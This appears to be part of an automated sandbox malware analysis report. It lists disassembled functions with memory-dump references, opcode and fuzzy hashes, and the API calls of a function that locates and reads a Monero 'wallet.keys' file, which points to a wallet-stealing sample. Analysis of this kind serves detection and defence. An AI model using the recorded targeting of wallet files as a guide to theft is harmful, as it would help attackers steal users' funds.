                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: a660a18fd9535349d85081eb2df43e6a49f49432c7ff5878fe31a870d5331c4f
                        • Instruction ID: fdd9c573da48655c46efea5400f7e6034f2fcfd2d312d2c351f9af63e7973dea
                        • Opcode Fuzzy Hash: a660a18fd9535349d85081eb2df43e6a49f49432c7ff5878fe31a870d5331c4f
                        • Instruction Fuzzy Hash: 4911CCB4A01209DFDB04DFA8D985AEE77B5FF88300F108599E91597390D774AE50CF61
                        Function 00AAAF02 Relevance: 4.2, Strings: 2, Instructions: 1686COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1Zw$|z
                        • API String ID: 0-2028459316
                        • Opcode ID: 49e53d3f84d7055c151b1cf03af6ef02a48cc0f9bd09b17325e5e847f0c49eb5
                        • Instruction ID: bee9e9b0cf2524be0040d3c8ab49cb073947f796a5bc45630f0d6d5f70d657ad
                        • Opcode Fuzzy Hash: 49e53d3f84d7055c151b1cf03af6ef02a48cc0f9bd09b17325e5e847f0c49eb5
                        • Instruction Fuzzy Hash: 45B206F360C214AFE3046E2DEC4567AFBE9EF94720F1A892DE6C4C7744E63598018697
                        Function 00A9ADDD Relevance: 3.2, Strings: 2, Instructions: 731COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: UO$x{7
                        • API String ID: 0-2793752487
                        • Opcode ID: 4e15a45ef3065c64df6613f475f33d72dcb7e6c1a7fa40d651635702e775b8e8
                        • Instruction ID: d5cd7dc131138cd01a67ef54d9136c23534fa0b3ab2f33557ccc9a47f5c84e90
                        • Opcode Fuzzy Hash: 4e15a45ef3065c64df6613f475f33d72dcb7e6c1a7fa40d651635702e775b8e8
                        • Instruction Fuzzy Hash: BB222BF3A082046FE3006E2DDC4566BBBDAEFD4320F1A8A3DE6C4D7744E53598058693
                        Function 00A5C12D Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: XP~
                        • API String ID: 0-3485761663
                        • Opcode ID: 9a186b63f3bdea21796f17520f6660c2391a5f99676b62d0603e7501f8d521c4
                        • Instruction ID: 47a5f17281d0807ed84d1504298f5cce40ecc71ea01de4e131ecf5f7117fcfeb
                        • Opcode Fuzzy Hash: 9a186b63f3bdea21796f17520f6660c2391a5f99676b62d0603e7501f8d521c4
                        • Instruction Fuzzy Hash: 917117F3E083045BE3049E3DDD8536AB7D6DBD4310F2B823D9B8887789E97A5C098685
                        Function 00A3A8E0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: VBB
                        • API String ID: 0-4113321273
                        • Opcode ID: cf942596a124dac04351a1aabefedce5cf946e1c685a582e895cf96770a9db82
                        • Instruction ID: ff955c27a46fec33d1e8a4ba0a43ba81bd038704202fe0775f55f5977fb7e205
                        • Opcode Fuzzy Hash: cf942596a124dac04351a1aabefedce5cf946e1c685a582e895cf96770a9db82
                        • Instruction Fuzzy Hash: AB4139F3B082145BF308AA2DEC557BBBBD5DB94360F1B463CEA88D7784D93998014386
                        Function 00AE9F94 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0[C{
                        • API String ID: 0-2902807198
                        • Opcode ID: ce47189d2a1ccef21ea35e7c343d159db75cfc93ca2544f3f2099679bf7b72cc
                        • Instruction ID: 715100454a24b047ce41a42f6e2f1cfe77ca2dfe62efe7e02f984d38730c3179
                        • Opcode Fuzzy Hash: ce47189d2a1ccef21ea35e7c343d159db75cfc93ca2544f3f2099679bf7b72cc
                        • Instruction Fuzzy Hash: AC3147B390C245EFD3086D669C1557BB6F8EB24351F32093EE983D7780EE65680562D3
                        Function 00A255B1 Relevance: .3, Instructions: 270COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5acf425412999e554055eabb340e634563c85d4da272c1bfabff6f3307d8d2ff
                        • Instruction ID: 592be38e8b348fa7153ac93fcfe0ad57f56fcddb2b1bd9928a92fa3fd9a03d5e
                        • Opcode Fuzzy Hash: 5acf425412999e554055eabb340e634563c85d4da272c1bfabff6f3307d8d2ff
                        • Instruction Fuzzy Hash: 158113F3E042205BE3146A2DEC4576ABBD6DBD0320F1B463DDEC8A3784E9795C0982D6
                        Function 009419F9 Relevance: .2, Instructions: 230COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa2a236cc31ab9dbc0b0b895175969d1fb49bc66b59f70ace26b9c5665299077
                        • Instruction ID: 5cf582062bfa6a4c601720d103a7f5b567d9eed427a9ecc7623675f4df8bb2f6
                        • Opcode Fuzzy Hash: fa2a236cc31ab9dbc0b0b895175969d1fb49bc66b59f70ace26b9c5665299077
                        • Instruction Fuzzy Hash: C971B1F3A087149FE704AF29D84572AFBE6EF94360F16893DDAC447384EA351845CB86
                        Function 00A83212 Relevance: .2, Instructions: 218COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 713bd3bd29772426eb59746cf35aa1a87d6192988762e0d9666044fe856bff1e
                        • Instruction ID: d13ac1d14bdb35ed925552d7adcd93a5b3223a7d173553a6a7b63f2905330963
                        • Opcode Fuzzy Hash: 713bd3bd29772426eb59746cf35aa1a87d6192988762e0d9666044fe856bff1e
                        • Instruction Fuzzy Hash: 04613DF3E082005BE3046A2DDD9473AB7D6EFD4710F1A453DEA8993784E9795C098693
                        Function 00A12621 Relevance: .2, Instructions: 195COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78680fb6153de89ab9d54c4254266e80c628db5807cf52bdc2f8832ab26492b1
                        • Instruction ID: 0cd94cd52829a748678294b04ec835f794a20ceabfb2dd3d2a426d57d11044ac
                        • Opcode Fuzzy Hash: 78680fb6153de89ab9d54c4254266e80c628db5807cf52bdc2f8832ab26492b1
                        • Instruction Fuzzy Hash: D1511CB3E083105BE3145E39EC8876ABBD5ABD0320F2B463DEAD8577C0E9395D458786
                        Function 009A9690 Relevance: .1, Instructions: 119COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53130a542b49a5bd6672930dc38122193b88f77e89714c2653f34fd50aef9632
                        • Instruction ID: 6530c7107546189cc17c68f7a4d8298bf7e22ee7d0181a73340a0b41b09a8198
                        • Opcode Fuzzy Hash: 53130a542b49a5bd6672930dc38122193b88f77e89714c2653f34fd50aef9632
                        • Instruction Fuzzy Hash: 393137F3A087005FE34CAA5AECD636AB6D7DBD8311F1AC03D9B8987388FD755901419A
                        Function 006E9750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 006E0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
